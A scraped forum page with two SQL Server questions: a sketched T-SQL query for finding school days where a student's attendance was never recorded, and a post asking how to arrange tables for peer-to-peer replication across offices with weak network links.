Any takers? Gotta run, dang I'm late for something.
TIA
--Scott
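One way to approach it: build the set of (student, date) pairs that should have attendance, then anti-join to DailyAttendance. A sketch only; it assumes Workday marks school weekdays, that the date portion of SchoolDayStartTime identifies an exception day, and that the joins run on the keys as named:
Code:
SELECT s.StudentID, c.Date
FROM Student s
JOIN StudentActivityHistory h      -- active enrollment periods
  ON h.StudentID = s.StudentID AND h.Activity_Status = 'A'
JOIN Calendar c                    -- school weekdays inside those periods
  ON c.Date BETWEEN h.StatusStartDate AND h.StatusEndDate AND c.Workday = 1
JOIN StudentSiteHistory sh         -- which site the student was at that day
  ON sh.StudentID = s.StudentID
 AND c.Date BETWEEN sh.SiteStartDate AND ISNULL(sh.SiteEndDate, '99991231')
JOIN SiteTerms t                   -- date must fall inside the site's term
  ON t.SiteID = sh.SiteID AND c.Date BETWEEN t.StartOfTerm AND t.EndOfTerm
WHERE NOT EXISTS (SELECT 1 FROM SiteExceptionDays e   -- skip no-attendance days
                  WHERE e.SiteID = sh.SiteID AND e.SchoolDayType = 'N'
                    AND DATEDIFF(day, e.SchoolDayStartTime, c.Date) = 0)
  AND NOT EXISTS (SELECT 1 FROM DailyAttendance a     -- attendance never taken
                  WHERE a.StudentID = s.StudentID AND a.AttendanceDate = c.Date)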
View 4 Replies
View Related
May 7, 2007
Hi all
My company is going to open new working centers on different locations of my region. One of the problems we are suffering is that at some locations, the network communications infrastructure is very very very poor. So, in that locations we work with low bandwidths, and connections usually break down.
Because of this, we are thinking of distributing our database. I have been doing some tests on replication, reading the docs, etc... But I am still not sure which replication strategy we should use, and how to organize our database tables to allow replication to work properly.
Our offices are going to share some data (a product catalogue, for example) which could be updated and queried from any of the offices. But there is also data which is not going to be shared, such as product stocks for each location.
We were thinking of using transactional peer-to-peer replication. But now we are having serious doubts about this since in a previous post (http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1525643&SiteID=1) we were told we can't store non-shared data (stock) in the same table as the shared data (products) due to how the database behaves when a publication is restarted. We know it would not be usual to republish, but we were thinking about crash recovery.
It would be fantastic if somebody could help us to decide what should we do to organize our database to allow the use of a proper replication scheme.
Thanks in advance,
Rubén D. M.
View 4 Replies
View Related